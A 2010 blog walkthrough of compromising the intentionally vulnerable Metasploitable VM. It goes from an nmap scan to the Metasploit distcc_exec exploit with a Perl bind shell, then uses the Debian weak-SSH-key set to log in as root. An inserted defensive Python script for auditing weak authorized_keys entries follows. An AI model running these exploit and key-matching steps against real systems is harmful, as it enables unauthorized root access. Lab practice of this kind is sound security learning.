Hacking distcc with Metasploit…

July 3, 2010 at 11:27 am (Metasploit, Security)

Hey,

I have been playing around with Metasploitable. This is an intentionally vulnerable test system produced by the Metasploit team. One of the services it is running is distcc. Today I will show you how to own it using Metasploit…

First of all we shall start with a port scan of the system:

root@bt:~# nmap -sV -sS -p1-65535 10.113.8.102

Starting Nmap 5.21 ( http://nmap.org ) at 2010-07-03 11:04 BST
Nmap scan report for ml-dkelly.messagelabs.com (10.113.8.102)
Host is up (0.0034s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:9F:54:C9 (VMware)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.45 seconds
root@bt:~#

We are most interested in the following line:

3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Right, so let’s fire up Metasploit then:

root@bt:/pentest/exploits/framework3# ./msfconsole


=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)

msf > search distcc
[*] Searching loaded modules for pattern ‘distcc’…

Exploits
========

Name Rank Description
---- ---- -----------
unix/misc/distcc_exec excellent DistCC Daemon Command Execution

msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port


Exploit target:

Id Name
-- ----
0 Automatic Target

msf exploit(distcc_exec) > set RHOST 10.113.8.102
RHOST => 10.113.8.102
msf exploit(distcc_exec) > show payloads

Compatible Payloads
===================

Name Rank Description
---- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/generic normal Unix Command, Generic command execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)

msf exploit(distcc_exec) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf exploit(distcc_exec) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.113.8.102 yes The target address
RPORT 3632 yes The target port

Payload options (cmd/unix/bind_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 10.113.8.102 no The target address

Exploit target:

Id Name
-- ----
0 Automatic Target

msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (10.113.10.116:55064 -> 10.113.8.102:4444) at Sat Jul 03 11:54:29 +0100 2010

whoami; uname -ar
daemon
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

Excellent, so we have a working bind shell and command execution on the target system as the daemon user... but what else can we do? The public key in /root/.ssh/authorized_keys was generated with the broken Debian OpenSSL random number generator, so it is one of a small, pre-computed set of keys; that means we should be able to find the matching private key and log in as root. First we must download debian_ssh_rsa_2048_x86.tar.bz2. You can quickly pop that into Google and find a place to download it, such as here. Once you have downloaded it, uncompress it, then perform the following steps:

* SNIP *
rsa/2048/22395760ea6265919ef5db8d26dda56c-17578
rsa/2048/e311fc52da0d062cd6e9a507a7470db8-15835.pub
rsa/2048/ae88b6e25a832541ac60978e90fb40fe-28014
rsa/2048/759ee1c853d2fcc07a13e6867ed75a35-26843
rsa/2048/22817b9fcfca9c043d6d48dac528b0a6-3298
rsa/2048/cd84c0196af31046b45037f39208c9c1-11710
rsa/2048/9634a42c34d72e776593a9f1ddd38085-2633
rsa/2048/1668b5d4171480a6359c0966ded47550-15730
rsa/2048/b8a7774ef9e5b9b2b73a685e509b899b-2131
root@bt:~/rsa/2048# grep -lir AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub

57c3115d77c56390332dc5c49978627a-5429.pub
root@bt:~/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@10.113.8.102
Last login: Sat Jul 3 07:01:04 2010 from 10.113.10.116
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#

So we managed to get a root shell on the vulnerable system 🙂
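As an added example (not code from the post), here is the defender's side of the grep step above: a small audit that parses an authorized_keys file, fingerprints each key the way `ssh-keygen -lf` does, and flags any key whose fingerprint is in a set of known-weak fingerprints. It also copes with option-prefixed entries (command="...") and reports malformed lines; the key blobs and the weak set are constructed inside the script, whereas in practice the set would be loaded from a published blocklist.

```python
import base64
import hashlib

# Key types that may appear in an authorized_keys line (options may precede the type).
KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}

def make_rsa_blob(e, n):
    # Wire format of an ssh-rsa public key: length-prefixed "ssh-rsa", e and n, then base64.
    return base64.b64encode(b"".join(len(p).to_bytes(4, "big") + p for p in (b"ssh-rsa", e, n))).decode()

def fingerprint(blob):
    # Same form as `ssh-keygen -lf` prints: SHA256 of the decoded blob, base64 without padding.
    digest = hashlib.sha256(base64.b64decode(blob, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_authorized_keys(text):
    # Returns (line_no, key_type, blob, comment) tuples; skips blank and comment lines.
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        tokens = raw.split()
        if not tokens or tokens[0].startswith("#"):
            continue
        for i, tok in enumerate(tokens):  # step over any leading options such as command="..."
            if tok in KEY_TYPES and i + 1 < len(tokens):
                entries.append((line_no, tok, tokens[i + 1], " ".join(tokens[i + 2:])))
                break
    return entries

def find_weak_keys(text, weak_fingerprints):
    # Flags entries whose fingerprint is in the weak set; undecodable blobs are reported separately.
    hits, malformed = [], []
    for line_no, key_type, blob, comment in parse_authorized_keys(text):
        try:
            fp = fingerprint(blob)
        except ValueError:  # binascii.Error is a subclass of ValueError
            malformed.append(line_no)
            continue
        if fp in weak_fingerprints:
            hits.append((line_no, key_type, fp, comment))
    return hits, malformed

# Constructed keys (not real key material): WEAK_BLOB stands in for an entry of a known-weak set.
WEAK_BLOB = make_rsa_blob(b"\x01\x00\x01", bytes(range(1, 33)))
OK_BLOB = make_rsa_blob(b"\x01\x00\x01", bytes(range(33, 65)))
WEAK_FINGERPRINTS = {fingerprint(WEAK_BLOB)}  # a real blocklist holds thousands of these
SAMPLE_AUTHORIZED_KEYS = f"""# constructed sample of /root/.ssh/authorized_keys
ssh-rsa {WEAK_BLOB} msfadmin@metasploitable
command="/usr/bin/backup",no-pty ssh-rsa {OK_BLOB} backup@host
ssh-rsa not-base64!! broken@host
"""
```

Running `find_weak_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_FINGERPRINTS)` flags only the msfadmin entry and lists the broken line as malformed.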

1 Comment

  1. Minnie Vanscoy said,

    This paragraph gives clear idea in favor of the new viewers of blogging, that truly how to do blogging.
